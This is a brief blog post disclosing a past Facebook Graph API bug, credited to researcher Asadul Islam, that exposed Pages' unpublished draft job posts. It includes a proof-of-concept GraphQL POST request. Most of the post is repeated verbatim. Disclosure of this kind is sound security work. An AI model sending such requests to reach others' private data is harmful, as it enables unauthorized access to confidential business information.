Recently, Facebook has launched publicly it's new upcoming "Job Posting" feature in Facebook Page. This feature is limited to the "US and Canada Region" business page's. More detail's can be find here.
Draft Job Post is like an upcoming job opening post saved in draft for future. Disclosing such draft post may result bad impact as it should be secrete information to the company.
One of Facebook Security Researcher "Asadul Islam" found this bug in "Facebook Graph API".
Author: Asadul Islam.
Proof of concept:
1) Make POST Request on graphql.
POST /v2.12/graphql HTTP/1.1
Host: graph.facebook.com
fb_api_caller=RelayModern&variables={"PageID":"123456789"}&doc_id=1846201855397726
Impact:
This could have let users access job posts which are not mean to be accessible.
Draft Job Post is like an upcoming job opening post saved in draft for future. Disclosing such draft post may result bad impact as it should be secrete information to the company.
One of Facebook Security Researcher "Asadul Islam" found this bug in "Facebook Graph API".
Author: Asadul Islam.
Proof of concept:
1) Make POST Request on graphql.
POST /v2.12/graphql HTTP/1.1
Host: graph.facebook.com
fb_api_caller=RelayModern&variables={"PageID":"123456789"}&doc_id=1846201855397726
Impact:
This could have let users access job posts which are not mean to be accessible.
No comments:
Post a Comment